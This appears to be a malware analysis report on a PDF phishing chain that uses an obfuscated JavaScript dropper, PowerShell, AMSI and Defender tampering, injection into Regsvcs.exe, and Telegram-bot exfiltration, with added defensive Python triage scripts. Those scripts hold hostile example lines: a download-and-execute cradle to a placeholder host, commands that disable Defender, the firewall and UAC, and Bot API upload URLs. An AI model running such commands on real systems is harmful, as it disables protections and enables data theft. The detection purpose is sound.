When Microsoft introduced macro-blocking safeguards for Office files delivered from the Internet, threat actors were forced to find other ways of distributing malware over email. The complex structure of PDF files makes malicious content hard to discover inside them, which leaves the format open to abuse. PDFs are a common email attachment type among consumers, so they give attackers an appealing opportunity to pass off malicious files as harmless ones. Exploiting this trust, attackers can easily build PDF-based malware, which frequently carries payloads hosted on rogue websites. These PDFs download the hosted payload when the user interacts with them, for example by clicking a link, which raises the chance of infection.

Infection Chain

This new infection chain, which delivers Malware, begins with an email carrying a PDF attachment, which in turn enables delivery of the final payload. In an obsolete, unpatched version of Acrobat Reader, the PDF uses MSHTA to execute embedded JavaScript, which then launches PowerShell and allows process injection. In the most recent version of Acrobat Reader, by contrast, the PDF cannot execute JavaScript directly; instead it sends the user to a rogue website from which the script is downloaded. From there the procedure is the same as in the first case. The kill chain for delivering Malware is as follows:

Initial Access

First, we’ll look at the scenario involving the new version of Acrobat Reader, since most users are likely to have it installed. Typically, these PDF files are disguised as invoices with a large download button, warnings demanding immediate action, or links designed to redirect users to seemingly benign destinations.

Looking at the PDF’s internal structure, an embedded URL and some hex data are found within one of its seven objects. Attackers mostly hide malicious links behind Bitly URLs, which makes them harder to spot. This is particularly useful in phishing, which deceives users into divulging personal data. Bitly links are dynamic, so attackers can change where they point after the fact, which improves their ability to avoid discovery. Furthermore, attackers take advantage of Bitly’s trusted reputation to make their social engineering schemes more effective.
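The kind of structural triage described above can be automated. The following Python script is an added example, not code from the original report: it scans the raw, uncompressed objects of a PDF for /URI actions, flags link-shortener hosts such as bit.ly, and reports the action-related name objects (/JavaScript, /OpenAction, /Launch and friends) that let a PDF do more than display pages. The sample PDF embedded in the script is constructed to mimic the shape of the file described here; the shortener list and the verdict thresholds are the example's own assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a minimal, uncompressed PDF shaped like the one described
# (a link annotation pointing at a URL shortener and an OpenAction that runs
# JavaScript). It is NOT the malicious file from the report.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [72 72 300 100]
   /A << /S /URI /URI (https://bit.ly/EXAMPLE-SHORTLINK) >> >> endobj
5 0 obj << /S /JavaScript /JS (app.alert('constructed sample');) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Hostnames of common link shorteners (assumed list; extend to taste).
SHORTENER_DOMAINS = {"bit.ly", "bitly.com", "tinyurl.com", "t.co", "goo.gl", "is.gd", "cutt.ly", "rb.gy"}
# PDF name objects that give a document the ability to act (run script, open a
# URL, launch a program, carry a file) rather than just display pages.
ACTION_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/EmbeddedFile", b"/URI")
RISKY_KEYS = {"/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile"}
OBJ_RE = re.compile(rb"\b\d+ \d+ obj\b")
URI_RE = re.compile(rb"/URI\s*\(([^)]*)\)")


def present_keys(data: bytes) -> list:
    """Action-related name objects present as whole tokens (so /JS does not match /JSX)."""
    found = []
    for key in ACTION_KEYS:
        if re.search(rb"(?<![A-Za-z])" + re.escape(key) + rb"(?![A-Za-z])", data):
            found.append(key.decode())
    return found


def scan_pdf(data: bytes) -> dict:
    """Summarise a PDF's uncompressed objects: URLs, shortener links, action keys, verdict.

    Caveat: objects inside compressed streams (/FlateDecode, object streams) are
    not decoded here; triage tools such as pdfid or peepdf inflate them first.
    """
    uris = [m.group(1).decode("latin-1") for m in URI_RE.finditer(data)]
    shortened = [u for u in uris if (urlparse(u).hostname or "").lower() in SHORTENER_DOMAINS]
    keys = present_keys(data)
    suspicious = bool(shortened) or bool(RISKY_KEYS & set(keys))
    return {
        "objects": len(OBJ_RE.findall(data)),
        "uris": uris,
        "shortener_uris": shortened,
        "action_keys": keys,
        "verdict": "suspicious" if suspicious else "clean",
    }


if __name__ == "__main__":
    for k, v in scan_pdf(SAMPLE_PDF).items():
        print(f"{k}: {v}")
```

A plain /URI pointing at a non-shortener host is reported but not treated as suspicious on its own; the shortener match and the script/launch keys are what raise the verdict, which mirrors the two variants of the chain (link redirect versus embedded JavaScript).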

Once the user approves the redirection, they are sent to the website, which attempts to pass itself off as a genuine, related site. Microsoft Defender SmartScreen warns the user that the content on this website is potentially dangerous. A JavaScript file is downloaded as soon as the website is entered. To trick the user into opening it as if it were the PDF, the JavaScript file is deliberately given exactly the same name as the PDF file.

As soon as the download starts, the browser is immediately redirected to the official original page so that the user sees nothing suspicious. The downloaded file is stored in the user’s Downloads folder. The JavaScript file’s content is heavily obfuscated. Attackers frequently use this strategy to hide their code, making analysis harder and helping them evade detection.

Execution

The process tree created when the JavaScript ran shows an attempt to fetch an XML file from the compromised web page using a PowerShell command line. Invoke-Expression (iex) was then used to execute the fetched content. In this case, the attackers used PowerShell’s replace operator to obscure the Invoke-Expression (iex) command. A sleep command, visible in the command line, paused execution for 5 seconds.

After circumventing the Microsoft Windows Anti-Malware Scan Interface (AMSI) by setting a specific value, the code creates registry entries for persistence. The script also defines methods for interacting with process memory and sets the global error action preference so that errors are silently hidden. It first checks whether the type AMSIReaper already exists and, if not, defines it with a set of declarations that import functions from the Windows kernel32.dll, including functions for manipulating process memory.

The script then carries out a series of actions meant to undermine the system’s security. It starts by adding Windows Defender exclusions for particular file extensions, paths, and processes, so that those objects are not scanned. Next, it attempts to modify several Windows Defender preferences, turning off important protections such as the Intrusion Prevention System, Real-time Monitoring, and Script Scanning, and changing settings for threat actions and reporting. To further weaken the system’s defenses, it also attempts to change registry settings related to User Account Control (UAC) and to turn off the Windows Firewall. Finally, it sets the global error action preference to Continue, which can hide any errors that occur while the script runs and keeps its harmful actions from being noticed. Taken together, these activities point to a deliberate attempt to undermine system security and open the door for further hostile activity.
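Every step in the execution stage leaves a process-creation record, so the stage is well suited to command-line detection. The Python script below is an added example, not part of the original report or its malware: it runs a small rule set over constructed process-creation events (timestamp, image, command line) that mimic what is described above, including the replace-obfuscated iex, the 5-second sleep, the error-suppression setting, the AMSIReaper-style Add-Type with kernel32 memory functions, the Defender exclusions and preference changes, the firewall and UAC tampering. The domains, paths, timestamps and the AMSIReaper type name's surroundings are placeholders, and the longer command lines are deliberately elided with "..."; the rule names and the tamper score are this example's own conventions.

```python
import re

# Constructed process-creation records (timestamp|image|command line), modelled on
# the behaviour the report describes. Domains and paths are placeholders and the
# longer commands are elided with "...": these are NOT the real scripts.
SAMPLE_EVENTS = r"""
2024-05-01T09:12:03|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\victim\Downloads\Invoice-2024.js
2024-05-01T09:12:04|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden -c "$ErrorActionPreference='SilentlyContinue'; $d=(New-Object Net.WebClient).DownloadString('http://EXAMPLE.invalid/update.xml'); Start-Sleep 5; $d | .('iXX' -replace 'XX','ex')"
2024-05-01T09:12:10|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "if (-not ('AMSIReaper' -as [type])) { Add-Type -TypeDefinition '... [DllImport(""kernel32.dll"")] ... OpenProcess ... WriteProcessMemory ...' }"
2024-05-01T09:12:11|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "Add-MpPreference -ExclusionPath 'C:\Users\Public' -ExclusionExtension 'js','dll' -ExclusionProcess 'powershell.exe'"
2024-05-01T09:12:12|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableIntrusionPreventionSystem $true"
2024-05-01T09:12:13|C:\Windows\System32\netsh.exe|netsh advfirewall set allprofiles state off
2024-05-01T09:12:14|C:\Windows\System32\reg.exe|reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
2024-05-01T10:30:00|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "Get-Process | Select-Object Name, Id"
""".strip().splitlines()

# (rule name, regex over the command line). Names are this example's own.
RULES = [
    ("script_host_js",     r"(?i)\b(wscript|cscript)\.exe\b.*\.js\b"),
    ("obfuscated_iex",     r"(?i)[&.]\s*\(\s*'[^']*'\s*-replace\s"),          # .('i..' -replace ..)
    ("download_cradle",    r"(?i)(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)"),
    ("sleep_delay",        r"(?i)\bsleep\s+(-s\w*\s+)?\d+"),                   # sandbox-evasion pause
    ("error_suppression",  r"(?i)ErrorActionPreference\s*=\s*.?SilentlyContinue"),
    ("amsi_memory_patch",  r"(?i)Add-Type.*DllImport\(\W*kernel32\.dll.*(Read|Write)ProcessMemory"),
    ("defender_exclusion", r"(?i)Add-MpPreference\b.*-Exclusion(Path|Extension|Process)"),
    ("defender_disable",   r"(?i)Set-MpPreference\b.*-Disable(RealtimeMonitoring|ScriptScanning|IntrusionPreventionSystem|IOAVProtection|BehaviorMonitoring)"),
    ("firewall_off",       r"(?i)netsh\s+advfirewall\s+set\s+\w+\s+state\s+off"),
    ("uac_tamper",         r"(?i)Policies\\System\b.*\b(EnableLUA|ConsentPromptBehaviorAdmin)\b"),
]
COMPILED = [(name, re.compile(rx)) for name, rx in RULES]
TAMPER_RULES = {"amsi_memory_patch", "defender_exclusion", "defender_disable", "firewall_off", "uac_tamper"}


def parse_event(line: str) -> dict:
    ts, image, cmd = line.split("|", 2)
    return {"ts": ts, "image": image, "cmd": cmd}


def match_rules(cmd: str) -> list:
    """Names of all rules whose pattern occurs in the command line, in rule order."""
    return [name for name, rx in COMPILED if rx.search(cmd)]


def triage(lines) -> list:
    """Return only the events that matched at least one rule, annotated with the rule names."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        hits = match_rules(ev["cmd"])
        if hits:
            ev["hits"] = hits
            findings.append(ev)
    return findings


def tamper_score(findings) -> int:
    """Number of distinct defence-tampering rules seen in a batch; several at once is a strong signal."""
    return len({h for ev in findings for h in ev["hits"] if h in TAMPER_RULES})


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for ev in found:
        print(ev["ts"], ", ".join(ev["hits"]))
    print("tamper score:", tamper_score(found))
```

The individual rules are noisy on their own (administrators do run Set-MpPreference), which is why the example also counts how many distinct tampering rules fire within one batch; the sequence described in this stage trips all five.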

Privilege Escalation

Following a short sleep, the script loads an assembly from the decoded content and uses reflection to carry out a command.

Process Injection

One of the files in the decoded data is a .NET DLL. This DLL injects the other data into the Regsvcs.exe process as its payload. The payload’s metadata is set up to make it look like a genuine McAfee package file, but it is not backed by a legitimate certificate, which shows it is fake. The executable is highly obfuscated, making much of its content unintelligible. It contains numerous methods with meaningless names, a deliberate ruse intended to hinder researchers.

Discovery

The attackers planned the obfuscation carefully. A routine decrypts each string on demand, taking specific parameters to produce the decoded content. This painstaking approach is intended to obstruct straightforward analysis and add further layers of complexity. The ProcMon logs show all of the browsers the malware queried.

Credential Access

Moreover, it steals private data, including cookies, browser history, credentials, SMTP details, session information, and email client data such as Outlook profiles.

Exfiltration

Debugging the code reveals the domain used for exfiltration, and the exfiltration URL is displayed. The DNS record for the IP address belongs to Telegram Messenger. This kind of malware uses Telegram bots for data exfiltration because of several beneficial properties. First, Telegram offers strong end-to-end encryption, protecting the data that is sent. Second, the platform gives bot developers anonymity, which makes their malicious activity more covert. Third, Telegram’s intuitive UI makes communication between attackers and their command-and-control system easier. Furthermore, because Telegram is so widely used as a messaging platform, traffic to its servers may look less suspicious than traffic to other channels, which helps avoid detection. Telegram’s robust infrastructure also makes it a dependable way to keep lines of communication open even during takedown attempts. All things considered, Telegram bots are an attractive option for Malware’s data exfiltration because of their security, anonymity, ease of use, stealth, and robustness. To exfiltrate, the malware connects to the website associated with the bot and sends the data, which is then recorded against a unique bot ID.
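Because the bot ID is part of the URL the malware calls, exfiltration over the Telegram Bot API is visible in proxy or TLS-inspection logs. The Python script below is an added example (not from the report) that parses constructed proxy log lines, recognises Bot API calls by their path shape (/bot<numeric id>:<secret>/<method>), drops the secret, and marks the upload methods so an analyst can pivot on the bot ID across clients. The log format, the client addresses, the bot ID and the token are all made up for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed proxy log lines: timestamp|client|method|url|bytes_out.
# The bot token is invented; real tokens have the form <numeric bot id>:<secret>.
PROXY_LOG = """
2024-05-01T09:15:01|10.0.0.23|GET|https://www.example.com/|512
2024-05-01T09:15:07|10.0.0.23|POST|https://api.telegram.org/bot123456789:AAEXAMPLE-not-a-real-token/sendDocument|184320
2024-05-01T09:15:08|10.0.0.23|POST|https://api.telegram.org/bot123456789:AAEXAMPLE-not-a-real-token/sendMessage|420
2024-05-01T09:16:00|10.0.0.41|GET|https://web.telegram.org/|2048
""".strip().splitlines()

BOT_API_HOST = "api.telegram.org"
BOT_PATH_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")
# Bot API methods that carry a file body; a document upload is the exfiltration shape.
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio"}


def parse_bot_call(url: str):
    """Return (bot_id, api_method) for a Telegram Bot API URL, else None.

    The secret half of the token is deliberately not returned, so findings can be
    shared without leaking a credential that might still be live.
    """
    u = urlparse(url)
    if (u.hostname or "").lower() != BOT_API_HOST:
        return None
    m = BOT_PATH_RE.match(u.path)
    return (m.group(1), m.group(3)) if m else None


def find_bot_exfil(lines) -> list:
    """All Bot API calls in the log, annotated with whether they are uploads."""
    findings = []
    for line in lines:
        ts, client, http_method, url, bytes_out = line.split("|")
        call = parse_bot_call(url)
        if call is None:
            continue
        bot_id, api_method = call
        findings.append({
            "ts": ts, "client": client, "bot_id": bot_id, "api_method": api_method,
            "bytes_out": int(bytes_out), "upload": api_method in UPLOAD_METHODS,
        })
    return findings


def bytes_per_bot(findings) -> dict:
    """Total bytes uploaded to each bot ID: the pivot value for hunting other victims."""
    totals = defaultdict(int)
    for f in findings:
        if f["upload"]:
            totals[f["bot_id"]] += f["bytes_out"]
    return dict(totals)


if __name__ == "__main__":
    hits = find_bot_exfil(PROXY_LOG)
    for h in hits:
        print(h)
    print(bytes_per_bot(hits))
```

The web.telegram.org line is intentionally left unflagged: ordinary messenger use and Bot API traffic share a brand but not a hostname or path shape, and keying the rule on the latter keeps the detection narrow.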

To put it briefly, this script’s tasks included decoding the payload, finding legitimate .NET executable paths, executing the malware through process injection, gathering information, and finally exfiltrating it.

Persistence

This script establishes persistence by building an HTA file that executes remotely fetched PowerShell commands. The HTA uses JavaScript code and ActiveX objects to run commands: specifically, it creates a WScript.Shell instance to execute a PowerShell command retrieved from a remote location.

It registers a scheduled task with Register-ScheduledTask. The task is set to start once at a specific time, computed from the current time and a predetermined number of minutes.

Finally, it creates a value under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, the Run key for the current user. This value manually starts the scheduled task created in the previous step by running the command schtasks /run /tn $taskName. Because the task’s start time is set relative to the current time, the script runs once more after the defined number of minutes.
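The three-part persistence described above (HTA file, scheduled task, Run value that kicks the task) can be audited from two artefacts: a dump of the current user's Run key and the XML of each task it references. The Python script below is an added example, not the report's code: it parses constructed reg query output, pulls the task name out of any schtasks /run /tn value, parses the matching Task Scheduler XML, and flags the chain when the task's action is a script host or an .hta file. The value name, task name, paths and times are made up, and the Task Scheduler XML namespace is the documented one.

```python
import re
import xml.etree.ElementTree as ET

# Constructed "reg query" output for the current user's Run key. OneDrive is a normal
# entry; "UpdaterKick" is an invented name standing in for the report's Run value.
RUN_KEY_EXPORT = r"""
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    OneDrive       REG_SZ    "C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    UpdaterKick    REG_SZ    schtasks /run /tn "UpdaterTask"
""".strip()

# Constructed Task Scheduler XML for the task the Run value points at (the real task's
# name, HTA path and trigger time are not given in the report).
TASK_XML = {
    "UpdaterTask": r"""<?xml version="1.0"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>2024-05-01T09:20:00</StartBoundary></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>mshta.exe</Command><Arguments>C:\Users\Public\update.hta</Arguments></Exec></Actions>
</Task>"""
}

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
SCRIPT_HOSTS = ("mshta", "powershell", "pwsh", "wscript", "cscript", "rundll32", "regsvr32")
TASK_RUN_RE = re.compile(r'(?i)schtasks(?:\.exe)?\s+/run\s+/tn\s+"?([^"\s]+)"?')
REG_LINE_RE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(.*)$")


def parse_run_key(text: str) -> list:
    """Values under the key, skipping the key-path header line."""
    entries = []
    for line in text.splitlines()[1:]:
        m = REG_LINE_RE.match(line)
        if m:
            entries.append({"name": m.group(1), "type": m.group(2), "data": m.group(3).strip()})
    return entries


def parse_task(xml_text: str) -> dict:
    """Action command/arguments and the first trigger of a Task Scheduler XML document."""
    root = ET.fromstring(xml_text)
    exec_ = root.find(f"{NS}Actions/{NS}Exec")
    trigger = root.find(f"{NS}Triggers/*")
    return {
        "command": exec_.findtext(f"{NS}Command", "") if exec_ is not None else "",
        "arguments": exec_.findtext(f"{NS}Arguments", "") if exec_ is not None else "",
        "trigger": trigger.tag.replace(NS, "") if trigger is not None else "",
        "start": root.findtext(f"{NS}Triggers/{NS}TimeTrigger/{NS}StartBoundary", ""),
    }


def uses_script_host(cmdline: str) -> bool:
    return any(re.search(rf"(?i)\b{h}(\.exe)?\b", cmdline) for h in SCRIPT_HOSTS)


def audit_persistence(run_key_text: str, tasks: dict) -> list:
    """Run values that start a scheduled task, with what that task actually executes."""
    findings = []
    for entry in parse_run_key(run_key_text):
        m = TASK_RUN_RE.search(entry["data"])
        if not m:
            continue                      # ordinary autostart value, not a task kick
        name = m.group(1)
        finding = {"run_value": entry["name"], "task": name, "task_found": name in tasks}
        if name in tasks:
            task = parse_task(tasks[name])
            finding.update(task)
            finding["script_host"] = uses_script_host(task["command"] + " " + task["arguments"])
            finding["hta"] = task["arguments"].lower().endswith(".hta")
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in audit_persistence(RUN_KEY_EXPORT, TASK_XML):
        print(f)
```

A Run value whose only job is schtasks /run is itself unusual enough to review; the task XML then tells you what fires, and mshta.exe pointed at an .hta under a user-writable path is the combination this chain relies on.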

Once MSHTA starts, a PowerShell instance is launched, which begins the injection of the malware into Regsvcs.exe. So if you are using an outdated, unpatched version of Acrobat Reader, you do not even need to interact with the PDF; simply opening the file infects your system.

Summary

The distribution of a PDF file with malicious content sets off a series of events. When the PDF is opened, the malicious code hidden inside causes a JavaScript payload to execute, which in turn downloads and runs a PowerShell script. To avoid detection, this PowerShell script decrypts and runs a binary in the form of a .NET DLL, which injects the malware payload into legitimate processes. The malware communicates with command-and-control servers to stealthily transfer private information using Telegram bots. To maintain its presence on the compromised system, the malware creates registry entries and scheduled tasks that let it run on a regular basis. In the previous version of Acrobat Reader, opening the PDF would automatically launch the malicious JavaScript and inject malware into Regsvcs.exe via PowerShell.

Mitigation

Staying watchful and cautious is necessary to avoid falling for email phishing. The following standard practices can help you avoid becoming a victim:

  • Check the sender information.
  • Think before clicking on warnings and links.
  • Look for grammar and spelling mistakes.
  • Watch what you send in emails and double-check any odd requests.
  • Use spam filters for email.
  • Verify secure HTTP connections.
  • Delete dubious emails.
  • Keep Windows and your security software updated.
  • Use the most recent, patched version of Adobe Reader.